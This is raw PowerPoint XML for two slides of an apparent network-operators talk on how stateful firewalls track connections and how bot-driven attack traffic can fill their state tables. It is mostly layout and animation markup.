                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stateful firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> really mean?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4468813" y="6565900"/>
            <a:ext cx="255587" cy="236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584200"/>
            <a:fld id="{1A619D33-0DC9-4D40-A7F5-FF7BC6E9CCDB}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr" defTabSz="584200"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4560888" y="1892300"/>
            <a:ext cx="9525" cy="2436813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF26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39688" defTabSz="914400"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13316" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3586163" y="2949575"/>
            <a:ext cx="1841500" cy="889000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1841501" cy="889001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13317" name="Picture 5" descr="10436_11_2004_ Giancarlo_WWAC.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41501" cy="889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318" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="366486" y="218370"/>
              <a:ext cx="1116657" cy="4741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marL="25400" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="FFFFFF"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13319" name="Picture 7"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25900" y="4203700"/>
            <a:ext cx="965200" cy="774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320" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5141913" y="4470400"/>
            <a:ext cx="3771900" cy="50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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>172.19.88.218 to 10.45.6.23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCP src port 7337, TCP dst port 22?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13321" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3971925" y="5414963"/>
            <a:ext cx="1071563" cy="1160462"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1070501" cy="1159499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13322" name="Picture 10"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300" y="0"/>
              <a:ext cx="965201" cy="977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323" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="860515"/>
              <a:ext cx="1044722" cy="2989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39688" algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>10.45.6.23 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13324" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4902200" y="5105400"/>
            <a:ext cx="4254500" cy="304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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> state-table entry, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> it!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13325" name="Picture 13" descr="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05275" y="1296988"/>
            <a:ext cx="8001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326" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6262688" y="4083050"/>
            <a:ext cx="1231900" cy="1206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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:cs typeface="Verdana" charset="0"/>
                <a:sym typeface="Verdana" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874920" y="6506666"/>
            <a:ext cx="2909646" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>*Originally presented by Roland Dobbins at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>AusNOG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9002346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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1331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iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13320"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1332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iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13324"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13324"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2025"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13326"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13326"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2100"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13315"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="133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nimBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="13315" grpId="1" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="13320" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="13324" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="13326"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AutoShape 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="0"/>
            <a:ext cx="8623300" cy="114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39688" defTabSz="914400">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bots Generate Lots of Attack Traffic, Rapidly Fill Up the State Table!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4468813" y="6565900"/>
            <a:ext cx="255587" cy="236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584200"/>
            <a:fld id="{666D9579-D59F-FF44-8B83-1700EE87F662}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr" defTabSz="584200"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15363" name="Picture 3"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425700"/>
            <a:ext cx="965200" cy="774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15364" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3640138" y="1042988"/>
            <a:ext cx="1296987" cy="788987"/>
            <a:chOff x="0" y="2908"/>
            <a:chExt cx="1297706" cy="788783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15365" name="Picture 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3690"/>
              <a:ext cx="1206500" cy="508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366" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5731" y="2908"/>
              <a:ext cx="1291975" cy="2989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39688" algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>172.19.21.144</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15367" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4025900" y="3198813"/>
            <a:ext cx="603250" cy="2590800"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="604574" cy="2590778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15368" name="Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="2" cy="2082801"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF26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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15369" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="304800" y="0"/>
              <a:ext cx="221" cy="2247901"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF26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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15370" name="Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="571500" y="0"/>
              <a:ext cx="33073" cy="2590778"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF26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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15371" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="5181600"/>
            <a:ext cx="1193800" cy="1206500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1193801" cy="1206501"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15372" name="Picture 12"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95899" cy="7106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373" name="Picture 13"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951" y="247935"/>
              <a:ext cx="695899" cy="7106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374" name="Picture 1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7902" y="495870"/>
              <a:ext cx="695899" cy="7106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15375" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3370263" y="3914775"/>
            <a:ext cx="1841500" cy="889000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1841501" cy="889001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15376" name="Picture 16" descr="10436_11_2004_ Giancarlo_WWAC.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41501" cy="889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377" name="AutoShape 17"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="366486" y="218370"/>
              <a:ext cx="1116657" cy="4741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marL="25400" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="FFFFFF"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15378" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="2324100"/>
            <a:ext cx="1384300" cy="989013"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1385686" cy="990127"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15379" name="AutoShape 19"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1385686" cy="9901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800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8351" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="6319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370" y="2294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4627" y="7617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721" y="11774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="14586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5666" y="13936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4761" y="17617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7714" y="15626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8484" y="21599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10531" y="14934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13246" y="19736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14019" y="14456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18144" y="18094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16836" y="12941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21599" y="13289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17606" y="10474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21096" y="8136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16701" y="7314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18379" y="4456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14154" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14521" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFB00"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>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39688" defTabSz="914400"/>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15380" name="AutoShape 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="293722" y="315763"/>
              <a:ext cx="780857" cy="2970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marL="46038" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="424242"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="424242"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15381" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
